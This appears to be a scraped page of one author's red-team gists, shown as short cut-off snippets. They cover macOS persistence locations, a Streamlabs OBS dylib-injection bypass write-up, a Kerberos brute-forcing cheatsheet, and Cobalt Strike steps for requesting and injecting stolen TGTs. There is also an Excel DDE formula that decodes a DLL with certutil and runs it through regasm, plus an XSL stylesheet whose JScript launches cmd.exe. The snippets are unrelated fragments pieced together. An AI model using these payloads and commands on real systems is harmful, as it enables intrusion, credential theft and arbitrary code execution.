its-a-feature

Apple persitence mecanisms

Type	Location	Documentation
Kernel/Sytem Extensions	/System/Library/Extensions/ /Library/Extensions/ /Extra/Extensions/	https://developer.apple.com/fr/support/kernel-extensions/ /Extra/Extensions/ is deprecated
Launch Daemons	/System/Library/LaunchDaemons/ /Library/LaunchDaemons/ /Users/*/Library/LaunchDaemons/	https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/Introduction.html
Launch Agents	/System/Library/LaunchAgents/ /Library/LaunchAgents/ /Users/*/Library/LaunchAgents/	https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/Introduction.html
Startup Items	/System/Library/StartupItems//Library/

its-a-feature

// ref: https://opensource.apple.com/source/dyld/[VERSION]/launch-cache/dsc_extractor.cpp.auto.html

// > SDKROOT=`xcrun --sdk macosx --show-sdk-path`
// > clang++ -o extract extract.cpp
// > mkdir libraries
// > ./extract /System/Library/dyld/dyld_shared_cache_x86_64 `pwd`/libraries/

#include <stdio.h>
#include <stddef.h>
#include <dlfcn.h>

its-a-feature

StreamLabs OBS macOS TCC bypass

The Streamlabs macOS thick client does have hardened runtime enabled, but specifically allows DYLD environment variables and also disables library validation, which kills the purpose of hardened runtime. Having these settings on the executable enables an attacker to inject custom DYLIB libraries into the application. This would allow an attacker to access data inside the app, and possibly gain persistence on a machine, beyond that, as StreamLabs has access to the microphone and camera a user would gain access to that once exploited.

We can see the wrong permissions with running the codesign utility:

csaby@bigsur ~ % codesign -dv --entitlements :- /Applications/Streamlabs\ OBS.app 
Executable=/Applications/Streamlabs OBS.app/Contents/MacOS/Streamlabs OBS
Identifier=com.streamlabs.slobs
Format=app bundle with Mach-O thin (x86_64)

its-a-feature

syscall = 0
exit = 1
fork = 2
read = 3
write = 4
open = 5
close = 6
wait4 = 7
link = 9
unlink = 10

its-a-feature

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

its-a-feature

WEB
1
https://ringzer0team.com/IQY

Selection=EntirePage
Formatting=RTF
PreFormattedTextToColumns=True
ConsecutiveDelimitersAsOne=True
SingleBlockTextImport=False
DisableDateRecognition=False

its-a-feature

=cmd|' /c more /E +12 %userprofile%\Downloads\poc.iqy > %temp%\poc.hex && certutil -decodehex %temp%\poc.hex %temp%\poc.dll && C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U %temp%\poc.dll'!'A1'

its-a-feature

# grab a TGT b64 blob with a valid NTLM
beacon> execute-assembly /home/specter/Rubeus_4.5.exe asktgt /user:USER /rc4:NTLM_HASH

# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi

# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter

# inject the .kirbi

its-a-feature

<?xml version='1.0'?>
<stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/>
	<ms:script implements-prefix="user" language="JScript">
	<![CDATA[
	var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
	]]> </ms:script>

its-a-feature

Domain: TEST.local
User Enumeration:
  Windows:
    net user
    net user /domain
    net user [username]
    net user [username] /domain
    wmic useraccount
  Mac:
    dscl . ls /Users